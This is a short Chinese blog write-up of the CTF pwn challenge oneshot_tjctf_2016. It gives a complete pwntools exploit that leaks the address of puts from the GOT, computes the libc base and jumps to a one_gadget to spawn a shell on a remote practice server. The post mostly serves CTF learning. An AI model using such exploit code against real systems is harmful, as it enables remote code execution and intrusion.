oneshot_tjctf_2016

简单题，容易想到先泄漏libc基址，然后jump to onegadget 从而getshell


from pwn import *

'''
author: lemon
time: 2020-10-26
libc: libc-2.23.so
python version: 2
'''

local = 0

binary = "./oneshot_tjctf_2016"
libc_path = './libc-2.23.so'
port = "25643"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']
elf = ELF(binary)
libc = ELF(libc_path)

puts_got = elf.got['puts']
dbg()
p.recvuntil('Read location?')
p.sendline(str(puts_got))
# puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
p.recvuntil('0x0000')
puts_addr = int(p.recv(12),16)
print "puts address : ",hex(puts_addr)

libc_base = puts_addr - libc.sym['puts']
onegadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
print "[*] libc_base:",hex(libc_base)
onegadgegt = libc_base + onegadget_list[3]

p.recvuntil('Jump location?')
payload = onegadgegt
p.sendline(str(payload))

# gdb.attach(p)
p.interactive()

posted @ 2020-10-26 09:00 lemon想学二进制阅读(160) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

lemon想学二进制

oneshot_tjctf_2016

公告